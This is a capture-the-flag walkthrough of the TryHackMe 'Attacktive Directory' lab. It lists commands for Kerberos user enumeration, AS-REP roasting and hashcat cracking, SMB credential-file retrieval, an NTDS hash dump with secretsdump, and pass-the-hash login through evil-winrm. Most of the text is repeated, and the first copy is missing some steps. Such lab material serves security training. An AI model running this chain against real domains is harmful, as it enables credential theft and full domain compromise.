TryHackMe - Attacktive Directory - Walkthrough
Introduction
Today we're going to be doing a walkthrough for the Attacktive Directory room hosted at https://tryhackme.com/room/attacktivedirectory . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows client as the the victim machine. After the Windows client IP is assigned, we alias the machine as attacktive.thm.
Task 1 - Intro - Deploy The Machine
Questions:
To access the Virtual Machine, you will need to first connect to our network using OpenVPN. Here is a mini walkthrough of getting connected.
No answer needed
Return to your access page. You can verify you are connected by looking on your access page. Refresh the page. You should see a green tick next to Connected. It will also show you your internal IP address.
No answer needed
Alternatively, you can deploy the In-Browser Kali or Attack Box and automatically be connected to the TryHackMe Network.
No answer needed
Once connected to the VPN, deploy the machine and get hacking!
No answer needed
Task 2 - Intro - Setup
Questions
Install Impacket, Bloodhound and Neo4j
No answer needed
Task 3 - Enumeration - Welcome to Attacktive Directory
Questions
What tool will allow us to enumerate port 139/445?
The tool we're looking for is for enum for Linux only.
What is the NetBIOS-Domain Name of the machine?
What notable account is discovered? (These should jump out at you)
What is the other notable account is discovered? (These should jump out at you)
./kerbrute64 userenum userlist.txt -d spookysec.local --dc attacktive.thm
Task 5 - Exploitation - Abusing Kerberos
Questions
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Create a list of users found through kerbrute userenum, then issue the following command:
python3 /opt/impacket/examples/GetNPUsers.py thm-ad/ -usersfile ./user.txt -dc-ip attacktive.thm -request -format hashcat -debug -outputfile asrep.hash | tee getnpusers.log
cat asrep.hash
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
What mode is the hash?
Navigate to the following URL:
https://hashcat.net/wiki/doku.php?id=example_hashes
Search for “AS-REP” on the page.
Now crack the hash with the modified password list provided, what is the user accounts password?
hashcat --force -m 18200 -a 0 asrep.hash ./passwordlist.txt
Task 6 - Enumeration - Back to the Basics
Questions
What utility can we use to map remote SMB shares?
Answer contained within the question hint.
Which option will list shares?
Answer contained within the question hint.
How many remote shares is the server listing?
There is one particular share that we have access to that contains a text file. Which share is it?
smbclient -L //attacktive.thm/ -U 'capturedUsername'
input cracked password
What is the content of the file?
smbclient //attacktive.thm/found-directory -U 'capturedUsername'
input cracked password
dir
get backup_credentials.txt
exit
cat backup_credentials.txt
Decoding the contents of the file, what is the full contents?
cat backup_credentials.txt | base64 -d
Task 7 - Domain Privilege Escalation - Elevating Privileges within the Domain
Questions
What method allowed us to dump NTDS.DIT?
python3 /opt/impacket/examples/secretsdump.py
What is the Administrators NTLM hash?
python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm 'spookysec.local/backup:capturedPassword@attacktive.thm'
What method of attack could allow us to authenticate as the user without the password?
Not the password, but rather the hash.
Using a tool called Evil-WinRM what option will allow us to use a hash?
evil-winrm
Task 8 - Flag Submission - Flag Submission Panel
Questions
svc-admin
evil-winrm -i attacktive.thm -u Administrator -H 'capturedHash'
type c:\users\svc-admin\desktop\user.txt.txt
backup
type c:\users\backup\desktop\privesc.txt
Administrator
type c:\users\administrator\desktop\root.txt
Finish
Today we're going to be doing a walkthrough for the Attacktive Directory room hosted at https://tryhackme.com/room/attacktivedirectory . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows client as the the victim machine. After the Windows client IP is assigned, we alias the machine as attacktive.thm.
Task 1 - Intro - Deploy The Machine
Questions:
To access the Virtual Machine, you will need to first connect to our network using OpenVPN. Here is a mini walkthrough of getting connected.
No answer needed
Return to your access page. You can verify you are connected by looking on your access page. Refresh the page. You should see a green tick next to Connected. It will also show you your internal IP address.
No answer needed
Alternatively, you can deploy the In-Browser Kali or Attack Box and automatically be connected to the TryHackMe Network.
No answer needed
Once connected to the VPN, deploy the machine and get hacking!
No answer needed
Task 2 - Intro - Setup
Questions
Install Impacket, Bloodhound and Neo4j
No answer needed
Task 3 - Enumeration - Welcome to Attacktive Directory
Questions
What tool will allow us to enumerate port 139/445?
The tool we're looking for is for enum for Linux only.
What is the NetBIOS-Domain Name of the machine?
nmap -T4 --top-ports=1000 -sC -sV attacktive.thm
What invalid TLD do people commonly use for their Active Directory Domain?
Answer is contained within the Hint for the question.
Task 4 - Enumeration - Enumerating Users via Kerberos
Questions
What command within Kerbrute will allow us to enumerate valid usernames?
./kerbrute64 -h
What notable account is discovered? (These should jump out at you)
What is the other notable account is discovered? (These should jump out at you)
./kerbrute64 userenum userlist.txt -d spookysec.local --dc attacktive.thm
Task 5 - Exploitation - Abusing Kerberos
Questions
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Create a list of users found through kerbrute userenum, then issue the following command:
python3 /opt/impacket/examples/GetNPUsers.py thm-ad/ -usersfile ./user.txt -dc-ip attacktive.thm -request -format hashcat -debug -outputfile asrep.hash | tee getnpusers.log
cat asrep.hash
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
What mode is the hash?
Navigate to the following URL:
https://hashcat.net/wiki/doku.php?id=example_hashes
Search for “AS-REP” on the page.
Now crack the hash with the modified password list provided, what is the user accounts password?
hashcat --force -m 18200 -a 0 asrep.hash ./passwordlist.txt
Task 6 - Enumeration - Back to the Basics
Questions
What utility can we use to map remote SMB shares?
Answer contained within the question hint.
Which option will list shares?
Answer contained within the question hint.
How many remote shares is the server listing?
There is one particular share that we have access to that contains a text file. Which share is it?
smbclient -L //attacktive.thm/ -U 'capturedUsername'
input cracked password
What is the content of the file?
smbclient //attacktive.thm/found-directory -U 'capturedUsername'
input cracked password
dir
get backup_credentials.txt
exit
cat backup_credentials.txt
Decoding the contents of the file, what is the full contents?
cat backup_credentials.txt | base64 -d
Task 7 - Domain Privilege Escalation - Elevating Privileges within the Domain
Questions
What method allowed us to dump NTDS.DIT?
python3 /opt/impacket/examples/secretsdump.py
What is the Administrators NTLM hash?
python3 /opt/impacket/examples/secretsdump.py -just-dc-ntlm 'spookysec.local/backup:capturedPassword@attacktive.thm'
What method of attack could allow us to authenticate as the user without the password?
Not the password, but rather the hash.
Using a tool called Evil-WinRM what option will allow us to use a hash?
evil-winrm
Task 8 - Flag Submission - Flag Submission Panel
Questions
svc-admin
evil-winrm -i attacktive.thm -u Administrator -H 'capturedHash'
type c:\users\svc-admin\desktop\user.txt.txt
backup
type c:\users\backup\desktop\privesc.txt
Administrator
type c:\users\administrator\desktop\root.txt
Finish
Comments
Post a Comment